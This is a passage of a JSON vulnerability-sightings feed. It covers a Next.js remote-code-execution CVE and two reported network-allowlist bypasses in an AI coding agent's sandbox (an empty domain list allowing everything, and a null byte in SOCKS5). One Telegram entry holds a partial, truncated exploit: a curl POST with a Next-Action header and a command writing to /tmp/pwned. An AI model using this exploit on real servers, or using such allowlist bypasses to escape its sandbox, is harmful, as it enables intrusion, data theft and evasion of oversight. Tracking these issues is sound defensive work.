30K+ installs at `github.com/yurukusa/cc-safe-setup`) ships the hook pattern Check 1 above generalizes \u2014 a per-version verification step that runs at session start and confirms the sandbox is actually enforcing what its configuration says it enforces. Three of the five Chapter 9 detection tools (`claim-vs-caveat-checker`, `subagent-inheritance-tester`, `settings-regression-tester`) are in feature branches awaiting merge to main; the fourth (`auth-path-detector`) and the fifth (`context-diff-monitor` as a design sketch) are referenced in the book.\n\nIf the only useful thing you take from this Gist is Check 1 above \u2014 verify the sandbox out-of-band, on every version bump \u2014 that is enough.\n", "creation_timestamp": "2026-05-21T07:18:12.000000Z"}, {"uuid": "f77402d1-3958-461e-acf3-40747f4ade6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66479", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mmlvd4ifra2g", "content": "\u5916\u304b\u3089\u898b\u305f\u7814\u7a76\u8005\u304c2\u56de\u8997\u3044\u3066\u30012\u56de\u3068\u3082\u5b8c\u5168\u30d0\u30a4\u30d1\u30b9\u3060\u3063\u305f\u3002\n\n1\u4ef6\u76ee\uff08CVE-2025-66479\uff09\uff1aallowedDomains \u3092\u7a7a\u306b\u3057\u305f\u3089\u300c\u5168\u90e8\u30d6\u30ed\u30c3\u30af\u300d\u3058\u3083\u306a\u304f\u300c\u5168\u90e8\u8a31\u53ef\u300d\u3068\u3057\u3066\u52d5\u3044\u305f\u3002\n2\u4ef6\u76ee\uff1aSOCKS5 \u306b null byte \u3092\u631f\u3093\u3067 allowlist \u3092\u7d20\u901a\u308a\u3002\n\n1\u4ef6\u76ee\u3092\u76f4\u3057\u305f\u30ea\u30ea\u30fc\u30b9\u304c2\u4ef6\u76ee\u3092\u305d\u306e\u307e\u307e\u51fa\u8377\u3057\u3066\u308b\u3002\u5b89\u5168\u3060\u3063\u305f\u77ac\u9593\u306f\u30bc\u30ed\u3002\ud83d\udc8e\n\nhttps://oddguan.com/blog/second-time-same-sandbox-anthropic-claude-code-network-allowlist-bypass-data-exfiltration/", "creation_timestamp": "2026-05-24T11:47:05.516579Z"}, {"uuid": "8623f03d-6b33-420b-91f0-a19e1604855d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/golangoss.bsky.social/post/3mn5drrl5el2g", "content": "Next.js-RSC-RCE-Scanner-CVE-2025-66478 (\u2b50\ufe0f 426)\n\nA command-line scanner for batch detection of Next.js application versions and determining if they are affected by CVE-2025-66478 vulnerability.\n\n#go", "creation_timestamp": "2026-05-31T10:21:05.828109Z"}, {"uuid": "c8cedc76-a5a7-4d70-984f-0c0366a8cc86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/nanvalue/292", "content": "Remote code execution (RCE) vulnerability exploit in Next JS \n\nCVE-2025-66478\n\ncommand=\"id > /tmp/pwned\"\n\ncat > payload.json < payload2.txt\n\nThen\ncurl -X POST http://localhost:3000 -H \"Next-Action: dontcare\" \\\n    -F \"0=/dev/null || true\nVulnerable versions of Next.js that embed a vulnerable React component are:\n\n15.x\n16.x\n14.3.0-canary.77 and later canary releases\nPatched versions are:\n\n15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7\n16.0.7", "creation_timestamp": "2025-12-08T23:06:08.000000Z"}, {"uuid": "7650614e-5278-48e9-8ce8-2e9b700955e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/giWyOtfvUlMszaifshsW3x69eXaG_tz6D-QR8xrWYPuAKSM", "content": "", "creation_timestamp": "2026-05-30T03:00:13.000000Z"}]}